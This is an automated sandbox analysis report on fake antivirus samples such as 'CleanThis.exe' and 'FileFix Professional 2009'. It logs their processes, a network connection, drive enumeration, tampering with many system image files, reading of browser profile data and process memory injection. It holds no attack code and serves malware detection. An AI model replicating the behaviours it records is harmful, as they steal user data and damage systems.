N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe"

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

Country Destination Domain Proto
LT 94.244.80.60:80 tcp

Files

memory/2368-0-0x0000000000400000-0x000000000057F000-memory.dmp

memory/2368-1-0x00000000003B0000-0x00000000003B1000-memory.dmp

memory/2708-5-0x0000000002E90000-0x0000000002E91000-memory.dmp

memory/2368-4-0x0000000000400000-0x000000000057F000-memory.dmp

memory/2584-6-0x0000000002B30000-0x0000000002B31000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

152s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\M: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\O: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\P: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\R: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\V: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\B: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\G: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\W: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\X: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\A: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\Y: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\J: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\K: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\N: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\T: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\Z: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\E: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\H: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\S: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\U: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\L: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\Q: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationUp_ButtonGraphic.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_down.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous_partly-cloudy.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\THMBNAIL.PNG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\logo.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\setting_back.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_left.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\logo.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)alertIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-today.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-down.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_down.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\icon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_settings.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_s.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_hover.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\1047x576black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\back_lrg.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_right.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-horizontal.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File created C:\Program Files (x86)\FileFix Professional 2009\is-F9R86.tmp C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ApothecaryLetter.dotx C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\play-background.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_docked.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\QUAD\THMBNAIL.PNG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\13.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_ButtonGraphic.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_hail.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\chapters-static.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATERMAR\THMBNAIL.PNG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-border.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-pets_31bf3856ad364e35_6.1.7600.16385_none_d0d7ee773d711005\Pets_btn-back-over-select.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-oldage_31bf3856ad364e35_6.1.7600.16385_none_02ee3365ea53e1ad\1047x576black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..yle-specialoccasion_31bf3856ad364e35_6.1.7600.16385_none_01242a21ddccaf3b\NavigationRight_ButtonGraphic.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-e..ebargadgetresources_31bf3856ad364e35_6.1.7600.16385_none_88767a95b8bbf001\Gadget_WMC_LogoText.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-currency_31bf3856ad364e35_6.1.7600.16385_none_c3b9072b536514f6\combo-hover-left.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..c-style-performance_31bf3856ad364e35_6.1.7600.16385_none_1d8aecb671a2bda5\PreviousMenuButtonIconSubpi.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-ringtonesamples_31bf3856ad364e35_6.1.7600.16385_none_135e536ebbe59c28\Ringtone 10.wma C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Images\ASPdotNET_logo.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..adisc-style-babyboy_31bf3856ad364e35_6.1.7600.16385_none_f13596916b261f67\nav_rightarrow.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-memories_31bf3856ad364e35_6.1.7600.16385_none_51190840a935f980\Title_select-highlight.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-stacking_31bf3856ad364e35_6.1.7600.16385_none_d0d2b98d4629a41f\photograph.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-travel_31bf3856ad364e35_6.1.7600.16385_none_f2a7c66510a5395d\header-background.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..sc-style-rectangles_31bf3856ad364e35_6.1.7600.16385_none_258f1924c482b7a1\NavigationRight_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\docked_black_rainy.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-m..ttheme-us-component_31bf3856ad364e35_6.1.7601.17514_none_b52573ad8e4c2d89\US-wp3.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..calmediadisc-styles_31bf3856ad364e35_6.1.7600.16385_none_dac1eab162daeb45\circleround_glass.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-pets_31bf3856ad364e35_6.1.7600.16385_none_d0d7ee773d711005\Pets_image-frame-ImageMask.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_3342e6899aa0557f\cronometer_s.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-oldage_31bf3856ad364e35_6.1.7600.16385_none_02ee3365ea53e1ad\NavigationLeft_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-e..ebargadgetresources_31bf3856ad364e35_6.1.7600.16385_none_88767a95b8bbf001\logo.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\undocked_gray_snow.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..c-style-performance_31bf3856ad364e35_6.1.7600.16385_none_1d8aecb671a2bda5\Perf_Scenes_Mask1.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-memories_31bf3856ad364e35_6.1.7600.16385_none_51190840a935f980\btn-next-static.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\25.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-stacking_31bf3856ad364e35_6.1.7600.16385_none_d0d2b98d4629a41f\1047x576black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-full_31bf3856ad364e35_6.1.7600.16385_none_ce3a164d3f0fa152\dotsdarkoverlay.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-cpu_31bf3856ad364e35_6.1.7600.16385_none_a79a90daaf5bbeef\glass.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-rssfeedsgadget_31bf3856ad364e35_6.1.7600.16385_none_07861dacd36a18f4\buttonUp_On.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-rssfeedsgadget_31bf3856ad364e35_6.1.7600.16385_none_07861dacd36a18f4\rss_headline_glow_flyout.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\2.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..yle-specialoccasion_31bf3856ad364e35_6.1.7600.16385_none_01242a21ddccaf3b\NavigationLeft_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..inboxgames-shanghai_31bf3856ad364e35_6.1.7600.16385_none_1c98ed5d08db04ce\MahjongMCE.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..oxgames-purbleplace_31bf3856ad364e35_6.1.7600.16385_none_622070221822eb39\PurblePlaceMCE.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Web\Wallpaper\Nature\img6.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\(144DPI)grayStateIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\(144DPI)notConnectedStateIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-full_31bf3856ad364e35_6.1.7600.16385_none_ce3a164d3f0fa152\NavigationRight_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-m..ttheme-gb-component_31bf3856ad364e35_6.1.7601.17514_none_92d51a492ae12096\GB-wp2.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..calmediadisc-styles_31bf3856ad364e35_6.1.7600.16385_none_dac1eab162daeb45\4to3Squareframe_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\topGradRepeat.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\29.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\undocked_black_moon-new_partly-cloudy.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\undocked_black_moon-waxing-crescent_partly-cloudy.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\35.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..lpaper-architecture_31bf3856ad364e35_6.1.7600.16385_none_d99106b927aa7782\img16.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-g..picturepuzzlegadget_31bf3856ad364e35_6.1.7600.16385_none_ce76f352fa54bd75\settings_corner_bottom_right.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-calendar_31bf3856ad364e35_6.1.7600.16385_none_6a1946701e0df451\bNext-hot.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-currency_31bf3856ad364e35_6.1.7600.16385_none_c3b9072b536514f6\graph_down.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..allpaper-landscapes_31bf3856ad364e35_6.1.7600.16385_none_e57abb2f66db71a9\img12.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-photosamples_31bf3856ad364e35_6.1.7600.16385_none_f36e0e659b8042be\Koala.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\28.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\docked_blue_sun.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-stacking_31bf3856ad364e35_6.1.7600.16385_none_d0d2b98d4629a41f\NavigationRight_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-pets_31bf3856ad364e35_6.1.7600.16385_none_d0d7ee773d711005\Pets_frame-border.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..yle-specialoccasion_31bf3856ad364e35_6.1.7600.16385_none_01242a21ddccaf3b\whitevignette1047.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Globalization\MCT\MCT-CA\Wallpaper\CA-wp3.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..c-style-performance_31bf3856ad364e35_6.1.7600.16385_none_1d8aecb671a2bda5\ParentMenuButtonIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Web\Wallpaper\Landscapes\img10.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-calendar_31bf3856ad364e35_6.1.7600.16385_none_6a1946701e0df451\rings-desk.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7601.17514_none_4f7e32f76654bd3c\Bears.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-oldage_31bf3856ad364e35_6.1.7600.16385_none_02ee3365ea53e1ad\vintage.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\undocked_gray_hail.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-travel_31bf3856ad364e35_6.1.7600.16385_none_f2a7c66510a5395d\play-background.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-memories_31bf3856ad364e35_6.1.7600.16385_none_51190840a935f980\button-highlight.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1696 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp
PID 1996 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp C:\Program Files (x86)\FileFix Professional 2009\wizard.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe"

